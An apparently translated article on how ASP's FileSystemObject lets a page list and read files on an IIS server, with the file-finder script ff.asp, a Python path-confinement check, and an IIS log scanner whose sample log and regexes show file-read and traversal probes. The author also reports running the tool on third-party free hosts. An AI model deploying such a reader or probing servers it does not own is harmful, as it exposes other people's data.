Threats to IIS web server data security from FSO objects in ASP, and countermeasures


Scripting.FileSystemObject is one of several COM objects supplied by scrrun.dll and driven from VBScript or JScript. It gives convenient access to text files and directories, but that same access is a threat to data security on an IIS web server: any ASP page can use it to walk and read whatever the account running the page is permitted to read.

The filefinder script (ff.asp) is simple: three functions and about 30 lines of sequential code.

The central function is FindFiles. It walks a directory tree recursively and reports every file whose name ends in the specified extension.

Function FindFiles(strStartFolder, strExt)
    Dim n
    Dim oThisFolder
    Dim oFolders
    Dim oFiles
    Dim oFolder
    Dim oFile

    ' If the administrator has set file-system permissions carefully, the calls
    ' below fail on protected folders. Some folders remain readable anyway, so
    ' errors are simply ignored and the traversal continues.
    On Error Resume Next

    n = 0
    Response.Write "<B>Searching " & Server.HTMLEncode(strStartFolder) & "</B><br>"
    ' g_fs is the Scripting.FileSystemObject created in the script's sequential code
    Set oThisFolder = g_fs.GetFolder(strStartFolder)

    Set oFiles = oThisFolder.Files
    For Each oFile In oFiles
        ' When the extension matches, emit a link back to this same script with a
        ' different command: cmd=read reads the text file at the given physical path.
        ' IsSuffix is one of the script's other two functions (not shown on this page).
        If IsSuffix(oFile.Path, strExt) Then
            ' The path goes into a query string, so it is URL-encoded there;
            ' the visible copy is HTML-encoded so file names cannot inject markup.
            Response.Write "<a target=_blank href='ff.asp?cmd=read&path=" & Server.URLEncode(oFile.Path) & "'><font color='dodgerblue'>" & Server.HTMLEncode(oFile.Path) & "</font></a><br>"
            If Err.Number = 0 Then
                n = n + 1
            End If
        End If
    Next

    Set oFolders = oThisFolder.SubFolders
    For Each oFolder In oFolders
        n = n + FindFiles(oFolder.Path, strExt)
    Next

    FindFiles = n
End Function

The sequential code that follows parses the parameters from the URL:

' Create the FileSystemObject used by FindFiles and ReadTextFile (this line is
' assumed; the page does not show it), then read each query-string parameter.
Set g_fs = Server.CreateObject("Scripting.FileSystemObject")
strCmd = UCase(Request.QueryString("cmd"))
strPath = Request.QueryString("path")
strExt = Request.QueryString("ext")
bRawData = UCase(Request.QueryString("raw"))

' Defaults: search the current directory for .asp files
If strPath = "" Then
    strPath = "."
End If
If strExt = "" Then
    strExt = ".asp"
End If

' Branch on the command. strCmd was upper-cased above, so the Case labels must be
' upper case as well (the page's lower-case labels would never match).
Select Case strCmd
    Case "FIND"
        Response.Write FindFiles(strPath, strExt) & " file(s) found"
    Case "READ"
        ' ReadTextFile is the script's third function (not shown on this page).
        ' raw=t returns the file verbatim; otherwise it is HTML-encoded inside <pre>.
        If bRawData = "T" Then
            Response.Write ReadTextFile(strPath)
        Else
            Response.Write "<pre>" & Server.HTMLEncode(ReadTextFile(strPath)) & "</pre>"
        End If
    Case Else
        Response.Write "Unknown command"   ' the page's original message is cut off here
End Select
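The script hands the path and ext parameters straight to the file system. The Python below is an added example, not part of ff.asp or of the article, showing the confinement check that any FSO-backed page serving files should perform: anchor every request at the web root, canonicalise it, and reject anything that resolves outside the root or carries an extension that is not on an allowlist. It uses ntpath so the Windows path rules apply wherever it is run; WEB_ROOT and READABLE_EXTENSIONS are constructed values standing in for what Server.MapPath("/") returns and for a site's own allowlist.

```python
"""Confine a client-supplied path to the web root before the file system sees it.

Added example, not part of ff.asp or the article. ntpath is used so the
Windows path rules apply on whatever platform this is run. WEB_ROOT and
READABLE_EXTENSIONS are constructed values standing in for what
Server.MapPath("/") returns and for a site's own allowlist.
"""
import ntpath

WEB_ROOT = r"C:\Inetpub\wwwroot"                 # constructed; ASP: Server.MapPath("/")
READABLE_EXTENSIONS = {".txt", ".htm", ".html"}  # constructed allowlist; never .asp/.inc/.asa


class PathRejected(ValueError):
    """Raised when a request would reach outside the permitted tree."""


def resolve_within_root(root, requested):
    """Return the normalised physical path for `requested`, or raise PathRejected.

    ntpath.join lets an absolute or drive-relative second argument replace the
    root, and normpath collapses '..' segments and forward slashes, so the
    comparison below sees the path the file system would actually open rather
    than the string the client sent.
    """
    if "\x00" in requested:
        raise PathRejected("NUL byte in path")
    root_norm = ntpath.normpath(root)
    candidate = ntpath.normpath(ntpath.join(root_norm, requested))
    root_cmp = ntpath.normcase(root_norm)        # NTFS compares case-insensitively
    cand_cmp = ntpath.normcase(candidate)
    # The trailing separator stops C:\Inetpub\wwwroot2 passing as inside C:\Inetpub\wwwroot.
    if cand_cmp != root_cmp and not cand_cmp.startswith(root_cmp + ntpath.sep):
        raise PathRejected("path escapes web root: %r" % requested)
    return candidate


def is_confined(root, requested):
    """Boolean form of resolve_within_root, handy for auditing a list of paths."""
    try:
        resolve_within_root(root, requested)
        return True
    except PathRejected:
        return False


def validate_request(params, root=WEB_ROOT):
    """Apply the checks ff.asp lacks to its own cmd/path/ext parameters.

    Returns (cmd, physical_path, ext). Unknown commands and unlisted
    extensions raise ValueError; escaping paths raise PathRejected.
    An empty path means the web root itself, never the process's current
    directory, which is what ff.asp's default of "." resolves against.
    """
    cmd = params.get("cmd", "").lower()
    if cmd not in ("find", "read"):
        raise ValueError("unknown command: %r" % cmd)
    physical = resolve_within_root(root, params.get("path", ""))
    if cmd == "find":
        ext = params.get("ext", ".txt").lower()
    else:
        # "readme.txt:stream" yields ".txt:stream", so alternate data streams fail the allowlist too
        ext = ntpath.splitext(physical)[1].lower()
    if ext not in READABLE_EXTENSIONS:
        raise ValueError("extension not permitted: %r" % ext)
    return cmd, physical, ext
```

In VBScript the same check is Server.MapPath for the root and g_fs.GetAbsolutePathName for the candidate, compared case-insensitively with a trailing backslash appended to the root, with a fixed extension allowlist in place of ff.asp's free-form ext parameter. Note that ff.asp's default path of "." is resolved relative to the IIS process's current directory rather than the web root, which is one more reason to anchor explicitly.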

The analysis above shows that, given sufficient permissions, filefinder can locate any text file on the IIS web server and display its contents. For non-text files it still reveals whether they exist and where they are. Such information is sometimes extremely valuable to a skilled attacker.

The precondition for this threat is that the account under which ff.asp runs has at least read permission on the directories and files concerned. The default security settings of Windows NT Server after installation grant all users "Read" on directories and files, so any user, whether the default IIS anonymous account IUSR_servername or another account, can list and read directory and file information. Most Windows NT Server administrators are mainly concerned with keeping the system running; they are generally reluctant to change the default directory and file permissions, since doing so carries real risk and requires considerable experience. Filefinder can therefore be used to check whether the file-system security settings of an NT server acting as a web server are adequate.
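A defender reading IIS logs can spot this kind of probing without knowing the script's name, because the interface described above leaves a recognisable trace: a cmd parameter paired with a path parameter holding a Windows physical path or a .. segment, typically preceded by enumeration requests from the same address. The Python below is an added example, not from the article; the log excerpt is constructed in the IIS W3C extended format (columns named by the #Fields directive, '-' for an empty field), and the rule names are my own.

```python
"""Flag file-system probing through an FSO-backed ASP page in IIS W3C logs.

Added example, not from the article. SAMPLE_LOG is constructed in the IIS
W3C extended format: '#Fields:' names the columns, '-' marks an empty field.
"""
import re
from urllib.parse import parse_qs

SAMPLE_LOG = r"""#Software: Microsoft Internet Information Services 5.0
#Version: 1.0
#Date: 2001-03-10 09:14:22
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2001-03-10 09:14:22 10.0.0.5 GET /index.asp - 200
2001-03-10 09:14:30 10.0.0.5 GET /ff.asp cmd=find&ext=.asp 200
2001-03-10 09:14:31 10.0.0.5 GET /ff.asp cmd=find&ext=.inc&path=C:\Inetpub 200
2001-03-10 09:15:02 10.0.0.5 GET /ff.asp cmd=read&path=C:\Inetpub\wwwroot\db\config.inc 200
2001-03-10 09:15:40 10.0.0.5 GET /ff.asp cmd=read&path=..\..\settings.ini&raw=t 200
2001-03-10 09:16:11 192.0.2.9 GET /products.asp id=7 200
2001-03-10 09:17:05 192.0.2.9 GET /ff.asp cmd=read&path=docs\readme.txt 404
"""

# Drive letter, UNC prefix, or a leading separator: a physical path, not a site-relative one.
PHYSICAL_PATH = re.compile(r"^(?:[A-Za-z]:|\\\\|[\\/])")
# A '..' segment delimited by separators or by the ends of the string.
TRAVERSAL = re.compile(r"(?:^|[\\/])\.\.(?:[\\/]|$)")


def parse_w3c(text):
    """Turn W3C extended log text into a list of {field: value} rows."""
    fields = None
    rows = []
    for line in text.splitlines():
        if not line.strip():
            continue
        if line.startswith("#"):
            if line.startswith("#Fields:"):
                fields = line[len("#Fields:"):].split()
            continue
        if fields is None:
            raise ValueError("log line before any #Fields directive")
        parts = line.split(" ")        # W3C encodes spaces inside values, so a plain split is safe
        if len(parts) != len(fields):
            continue                   # malformed line: skip it rather than abort the scan
        rows.append(dict(zip(fields, parts)))
    return rows


def query_params(raw):
    """Decode cs-uri-query into a {lower-case name: first value} dict."""
    if raw in ("", "-"):
        return {}
    return {k.lower(): v[0] for k, v in parse_qs(raw, keep_blank_values=True).items()}


def classify(row):
    """Return a rule name for a suspicious row, or None."""
    q = query_params(row.get("cs-uri-query", "-"))
    cmd = q.get("cmd", "").lower()
    path = q.get("path", "")
    if cmd not in ("find", "read"):
        return None
    if path and (PHYSICAL_PATH.match(path) or TRAVERSAL.search(path)):
        return "fs-access-outside-webroot"   # physical path or '..' handed to the file system
    if cmd == "read":
        return "file-read-by-path"           # arbitrary file read, even when site-relative
    return "directory-enumeration"           # cmd=find walks the tree for an extension


def scan(text):
    """Run classify over every row; return the findings in log order."""
    findings = []
    for row in parse_w3c(text):
        rule = classify(row)
        if rule:
            findings.append({
                "when": row["date"] + " " + row["time"],
                "ip": row["c-ip"],
                "uri": row["cs-uri-stem"],
                "status": row["sc-status"],
                "rule": rule,
            })
    return findings


def by_source(findings):
    """Count findings per client address; a probe shows as enumerate-then-read from one source."""
    counts = {}
    for f in findings:
        counts[f["ip"]] = counts.get(f["ip"], 0) + 1
    return counts


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f["when"], f["ip"], f["uri"], f["status"], f["rule"])
    print(by_source(scan(SAMPLE_LOG)))
```

The rules key on ff.asp's parameter names; for a renamed tool, apply the two path heuristics to every query parameter instead of only path, a one-line change in classify. Grouping findings by source separates the enumerate-then-read sequence of a probe from a single odd request, and the 404 on the last sample line shows why failed attempts are worth keeping in the count.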

The author set the permissions on the file system of the IIS web server manually. However, because of a lack of experience, this caused many strange errors; for example, the NT Server 4.0 used in the experiment could no longer connect to the Access database. These functions worked normally before the file-system permissions were changed.

For purely research purposes, the author also tested the free ASP space I had applied for (including my personal home page provided by CSDN). The result was that filefinder ran without any trouble. The personal home page I applied for at http://www2.domaindlx.com/index.html, however, did not have this problem, which shows that this free ASP home page provider takes the matter more seriously. Although the domaindlx web server runs on Windows 2000 Server, its default file system security permissions are not significantly different from those of NT 4.0.

The author's ability is limited, so the discussion ends here. This document is intended only as a reference for ASP home page providers in China, in the hope that it helps both providers and customers with data security.

Appendix: the same applies to other server-side scripting environments used to run web services. If Scripting.FileSystemObject is likewise available for file system operations, every such platform has the same problem.
